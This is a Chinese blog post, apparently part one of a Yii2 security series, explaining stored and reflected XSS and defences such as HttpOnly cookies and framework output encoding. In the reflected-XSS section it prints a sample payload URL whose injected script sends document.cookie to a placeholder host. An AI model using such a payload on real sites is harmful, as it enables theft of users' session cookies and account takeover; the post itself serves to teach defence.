YII2框架学习 安全篇(一) XSS攻击和防范(上)

最新推荐文章于 2021-04-13 13:37:12 发布
原创 最新推荐文章于 2021-04-13 13:37:12 发布 · 2.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#yii #信息安全 #漏洞 #安全漏洞 #xss攻击

本文介绍了XSS攻击的两种类型:基于存储的XSS攻击和基于反射的XSS攻击,并详细解释了这两种攻击如何实现及如何防范。文章还讨论了如何使用YII框架来帮助抵御这些威胁。

在如今的web开发中,网络安全,信息安全应该是最重要的一环。常见的攻击主要有四类,XSS攻击、CSRF攻击、SQL注入和文件上传漏洞。在接下来的安全篇里,我会依次说明YII框架是如何应对这些攻击的。本篇要学习的就是XSS攻击和防范之存储。

XSS攻击的意思是跨站脚本攻击,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。下面就以实际例子说明把。

1)盗取用户账号(基于存储的XSS攻击

大概说一下盗号的原理。在用户登陆网站后,网站服务器会生成相应的session存储该用户登陆信息,并返回给用户浏览器cookie存储起来。下次向服务器请求数据的时候带上cookie里面的数据,就可以行驶用户权限了。那么,黑客只要通过js注入得到了这个cookie就可以伪装为用户了。

那么,重点来了怎么防止cookies泄露呢。httponly出现了,只要在cookie添加这个属性,那么js(document.cookie)就提取不到这个信息。

2)非法转账(基于反射的XSS攻击

如果在用户的支付界面植入一段js代码,自动填写收款人和金额并提交,就能完成转账。植入js代码的方法是,让别人点击植入了js代码的链接,如

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

在这个前提,你就可以在别人的界面为非作歹了。还好,yii框架会让浏览器自动过滤js代码。

比较晚了,明天出下篇,继续讲反射xss还有蠕虫

yii2框架开发之xss、csrf、sql注入、文件上传漏洞攻击
西瓜的博客
02-21 8376
常见的漏洞攻击:1、xss:是跨站脚本攻击    分3类:1、存储型2、反射型3、蠕虫型2、csrf:是跨站请求伪造攻击    分2类:1、get型2、post型3、sql注入4、文件上传xss攻击xss攻击可以:盗取用户账号、也可以盗取后进行非法转账、还可以篡改系统信息、网站挂马等存储型xss下面我们来看下盗号代码(存储型xss):1、通过在浏览器f12 console中输入:2、docume...
yii2 XSS攻击 - CSRF防范策略
Terry - 专注外贸B2C
10-06 3379
CSRF防范策略
yii2视图防xss攻击
zhangzhangdan的博客
07-12 791
XSS攻击:跨站脚本攻击(Cross Site Scripting)XSS种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它 用户使用的页面中。比如这些代码包括HTML代码客户端脚本。在控制器层用户输入了个javascript代码,若未做处理,则会直接以javascript方式输出,这样就存在全隐患我们可以在视图层这样过滤此代码攻击:那浏览器输出格式是怎...
Yii2 XSS 防范策略
wjtlht928的专栏
06-08 889
XSS 漏洞修复 原则: 不相信客户输入的数据 注意: 攻击代码不定在《script》《/script》中 将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了. 只允许用户输入我们期望的数据。 例如: 年龄的textbox中,只允许用户输入数字。 而数字之外的字符都过滤掉。 对数据进行Htm
Yii2XSS攻击防范策略分析
10-21
主要介绍了Yii2XSS攻击防范策略,较为详细的分析了XSS攻击的原理及Yii2相应的防范策略,需要的朋友可以参考下
2016最全Yii框架
07-22
 2016最全Yii框架 YII是目前比较火的框架框架里面使用了最新的技术设计,可以说学习YII学习了最新的php技术,本课程主要学习XSS、CSRF、SQL注入、文件上传漏洞攻击方式,以及YII框架对它们的防范处理...
yii框架中文手册教程
02-28
6. 全性:Yii框架重视Web应用的全性,它提供了许多内置的全特性来帮助开发者防范常见的全威胁,比如SQL注入、跨站脚本攻击XSS)等。 7. 易用的命令行工具:Yii框架提供了个名为yiic的命令行工具,可以...
YII2.0框架HTML离线文档手册
最后,**全性方面**,Yii 2.0内置CSRF防护、输入过滤、SQL注入防御、XSS跨站脚本攻击防范等多种全策略,默认开启即生效,显著降低常见Web漏洞风险。 综上所述,这份YII2.0手册HTML离线版不仅是技术参考书,更是...
Yii框架深度解析与实战指南
4. **全防护**:Yii内置了多种全防护机制,如XSSCSRF防范,以及输入验证输出过滤,确保应用的全运行。 5. **数据库支持**:Yii支持数据访问对象(DAO)活动记录(ActiveRecord)模式,方便进行数据库...
Yii2打造的通用后台系统管理与用户功能实现
综上所述,Yii2通用后台系统涵盖了从用户注册登录到头像上传等系列后台管理功能,并利用Yii2框架强大的内置组件扩展性,实现高效全的Web应用开发。通过文件的命名组织,可以看出Yii2强调代码的可读性...
YII2框架学习 全篇(二) XSS攻击防范(下)
混血王子的博客
06-19 2850
坚持写博客真不容易,618抢购中断了波就不想写了。接着XSS攻击防范(上)继续讲基于反射的XSS攻击。 1)非法转账(基于反射的XSS攻击) 上周说的yii框架会让浏览器自动过滤js代码是不太准确的,般是把js代码重新编码并加双引号变成字符串了。 但是,要注意的点是防止js代码越狱,脱离编码双引号。类似于",alert(3)//" 这种。这种时候只要把双引号也重新编码就可以防止越狱
yii2视图参数xss攻击脚本过滤
成长中de大神
06-22 1155
视图参数xss攻击脚本过滤 class HomeController extends Controller { public function actionIndex() { $data = [ 'str' =&amp;amp;gt; 'hello world &amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;',
yii2.0防止跨站脚本攻击方法
weixin_30619101的博客
12-18 185
控制器代码 public function actionIndex(){ //视图需要显示的数据 $hello_str = 'hello God!<script>alert(3)</script>'; //创建个数组 $data = array(); //把需要传递给视图的数据,放到数组当中 $data['view_hello_str']=$hello_...
yii2过滤xss代码,防止sql注入教程
luyaran的博客
12-05 2199
实际开发中,涉及到的语言也好,框架也罢,web全问题总是不可避免要考虑在内的,潜意识中的考虑。 意思就是说喃,有条河,河很深,在没办法游过去的情况下你只能沿着河上唯座桥走过去。 好啦,我们看看在yii框架的不同版本中是怎么处理xss攻击,sql注入等问题的。 啥啥啥,xss是啥,sql注入又是啥?哦我的天呐,不好意思,我也不知道,这个您问问小度小哥都行,随您。 通俗的说喃,就是两
YII2框架全篇
woshihaiyong168的博客
11-10 2844
YII2框架真的是款十分强大的框架,相对于TPCI来说,功能更加完善,更加全 那么我们在功能完成的同时,全是重中之重 下面我们就来看看YII框架中有哪些加密的方法!!       1、首先我们在做用户密码加密的时候我们般都会采用md5来进行加密,在YII2框架中有个加密方式比md5更加复杂      //哈希加密 $password="123"; $hash =
关于yii2框架中内存泄漏的解决方案
特务阿⑦的博客
09-07 3409
现象描述: 命令行执行个7万行的脚本,循环里进行各种查询。结果每次都会报出内存溢出的错误,类似于这样: 第 475 次,消耗内存 312.68MB第 476 次,消耗内存 313.22MB第 477 次,消耗内存 313.79MB。还是报错。内存溢出。Allowed memory size of 402653184 bytes exhausted (tried to allocate 8388
Yii框架防止sql注入,xss攻击与csrf攻击的方法
龙cc的博客
10-11 1293
本文实例讲述了Yii框架防止sql注入,xss攻击与csrf攻击的方法。分享给大家供大家参考,具体如下: PHP中常用到的方法有:/* 防sql注入,xss攻击 (1)*/ function actionClean($str) { $str=trim($str); $str=strip_tags($str); $str=stripslashes($str); $st
yii php framework 漏洞,yii框架异常处理导致的xss.md
weixin_39990410的博客
04-13 1216
最近XSS扫描器发现了些奇怪的漏洞,对些特征归类,查询,发现是属于yii 1.x框架Yii个免费的,开源的,基于PHP的Web应用程序开发框架虽然YII 已经发布了2.x,但1.x的使用量还是很大的复现下载yii 1.xgit clone https://github.com/yiisoft/yii运行自带的blog demo当请求头带有X-Requested-With: XMLHttp...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值